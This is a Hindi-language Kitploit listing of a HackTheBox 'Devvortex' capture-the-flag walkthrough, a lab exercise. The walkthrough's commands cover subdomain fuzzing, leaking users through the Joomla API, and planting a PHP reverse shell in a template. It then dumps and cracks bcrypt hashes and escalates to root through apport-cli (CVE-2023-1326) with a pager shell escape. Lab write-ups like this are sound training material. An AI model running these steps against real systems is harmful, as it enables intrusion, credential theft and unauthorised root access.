Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
DEVVORTEX — HackTheBox Devvortex वॉकथ्रू जिसमें सबडोमेन फ़ज़िंग, Joomla API एन्यूमरेशन, टेम्पलेट-आधारित वेब शेल, bcrypt हैश क्रैकिंग, और Apport-CLI CVE-2023-1326 प्रिविलेज एस्केलेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/r3fr4kt/devvortex
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिभेद्यता विश्लेषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाCTFपेनिट्रेशन टेस्टिंगसबडोमेन एनुमरेशनलर्निंग और शिक्षालैब और अभ्यास
GitHubr3fr4kt/devvortex
2420 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DEVVORTEX

HackTheBox Devvortex वॉकथ्रू जिसमें सबडोमेन फ़ज़िंग, Joomla API एन्यूमरेशन, टेम्पलेट-आधारित वेब शेल, bcrypt हैश क्रैकिंग, और Apport-CLI CVE-2023-1326 प्रिविलेज एस्केलेशन शामिल है।

रिपॉजिटरी देखें

DEVVORTEX

HackTheBox: Devvortex — मशीन राइट-अप

HackTheBox पर Devvortex मशीन के कम्प्रोमाइज़ का विस्तृत तकनीकी वॉकथ्रू। यह पथ सबडोमेन फ़ज़िंग, Joomla API एन्यूमरेशन, प्रारंभिक एक्सेस के लिए टेम्पलेट संशोधन, लेटरल मूवमेंट के लिए डेटाबेस हैश निष्कर्षण और क्रैकिंग, और रूट तक प्रिविलेज एस्केलेशन के लिए Apport-CLI (CVE-2023-1326) के शोषण को प्रदर्शित करता है।


कार्यकारी सारांश

  • लक्ष्य OS: Linux
  • कठिनाई: आसान
  • डोमेन: devvortex.htb
  • सबडोमेन: dev.devvortex.htb
  • मुख्य अवधारणाएँ: सबडोमेन एन्यूमरेशन, Joomla CMS शोषण, सूचना प्रकटीकरण, Bcrypt हैश क्रैकिंग, Sudo दुरुपयोग (apport-cli)।

1. रेकॉनिसेंस और एन्यूमरेशन

पोर्ट स्कैनिंग (Nmap)

सभी पोर्ट्स पर एक प्रारंभिक तेज़ TCP पोर्ट डिस्कवरी की गई:

nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

पहचाने गए खुले पोर्ट्स के विरुद्ध एक अनुवर्ती सेवा और संस्करण डिटेक्शन स्कैन निष्पादित किया गया:

Bash

nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

होस्टफ़ाइल कॉन्फ़िगरेशन

अपनी स्थानीय होस्टनेम रिज़ॉल्यूशन तालिका में बेस लक्ष्य डोमेन जोड़ें:

Bash

sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

सबडोमेन डिस्कवरी (FFUF)

अतिरिक्त वेब एसेट्स की पहचान के लिए वर्चुअल होस्ट्स को फ़ज़ करना:

Bash

ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

परिणाम: dev.devvortex.htb खोजा गया। /etc/hosts में dev.devvortex.htb जोड़ा गया।

डायरेक्टरी फ़ज़िंग

नए खोजे गए वर्चुअल होस्ट पर रूट्स की एन्यूमरेशन:

Bash

ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

परिणाम: /administrator एंडपॉइंट खोजा गया, जो एक Joomla एडमिन ऑथेंटिकेशन पोर्टल को उजागर करता है।

2. प्रारंभिक एक्सेस (फ़ुटहोल्ड)

Joomla API के माध्यम से सूचना लीकेज

संवेदनशील एप्लिकेशन मेट्रिक्स और उपयोगकर्ताओं को इकट्ठा करने के लिए Joomla के REST API द्वारा उजागर सार्वजनिक एंडपॉइंट्स की जाँच:

Bash

curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

साइट टेम्पलेट्स के माध्यम से वेब शेल इंजेक्शन

एन्यूमरेशन के दौरान पाए गए क्रेडेंशियल्स का उपयोग करके, Joomla /administrator पोर्टल में लॉग इन करें:

  1. System > Site Templates पर जाएँ।

  2. सक्रिय टेम्पलेट चुनें और error.php खोलें।

  3. error.php की सामग्री को एक मानक PHP रिवर्स शेल पेलोड से बदलें।

एक स्थानीय netcat लिसनर प्रारंभ करें:

Bash

nc -lvnp 4444

एक अनुपस्थित पेज का अनुरोध करके या सीधे फ़ाइल को हिट करके error.php के निष्पादन को ट्रिगर करें।

TTY शेल स्थिरीकरण

एक बार शेल www-data के रूप में कनेक्ट हो जाने पर, एक इंटरैक्टिव PTY सत्र उत्पन्न करें:

Bash

python3 -c 'import pty; pty.spawn("/bin/bash")'

3. लेटरल मूवमेंट (Logan)

डेटाबेस एन्यूमरेशन

वेब कॉन्फ़िगरेशन फ़ाइलों से प्राप्त क्रेडेंशियल्स का उपयोग करके स्थानीय MySQL डेटाबेस तक पहुँचें:

Bash

mysql -u lewis -p

संग्रहीत क्रेडेंशियल हैश का पता लगाने के लिए उपयोगकर्ता तालिका को क्वेरी करें:

SQL

SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

ऑफ़लाइन पासवर्ड क्रैकिंग

उपयोगकर्ता logan के लिए bcrypt पासवर्ड हैश को एक स्थानीय फ़ाइल में निकालें:

Bash

nano hash.txt

rockyou.txt के साथ John the Ripper का उपयोग करके हैश को क्रैक करें:

Bash

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

SSH के माध्यम से प्रमाणीकरण

क्रैक किए गए क्रेडेंशियल्स के साथ उपयोगकर्ता logan के रूप में एक स्थायी SSH सत्र स्थापित करें:

Bash

ssh [email protected]

यूज़र फ़्लैग

Bash

cat user.txt

4. प्रिविलेज एस्केलेशन

Sudo प्रिविलेज ऑडिट

logan उपयोगकर्ता के लिए अनुमत बाइनरीज़ का निरीक्षण करें:

Bash

sudo -l

आउटपुट: उपयोगकर्ता /usr/bin/apport-cli को root के रूप में चला सकता है।

Apport-CLI शोषण (CVE-2023-1326)

apport-cli के इंस्टॉल किए गए संस्करण की जाँच करें:

Bash

apport-cli --version

मौजूदा रिपोर्ट फ़ाइलों के लिए /var/crash का निरीक्षण करें। यदि खाली है, तो मैन्युअल रूप से एक क्रैश फ़ाइल बनाएँ:

Bash

echo "ProblemType: Crash" > /var/crash/.crash

sudo का उपयोग करके बनाई गई क्रैश फ़ाइल के विरुद्ध apport-cli लॉन्च करें:

Bash

sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. View report के लिए v दबाएँ।

  2. जब पेजिनेटर (less) सामग्री लोड करता है, तो निम्न दर्ज करके सिस्टम शेल में एस्केप करें:

Plaintext

!/bin/bash

5. सिस्टम समेकन

root एलिवेशन सत्यापित करें:

Bash

whoami
# Output: root

रूट फ़्लैग

Bash

cat /root/root.txt
टूल डाउनलोड करें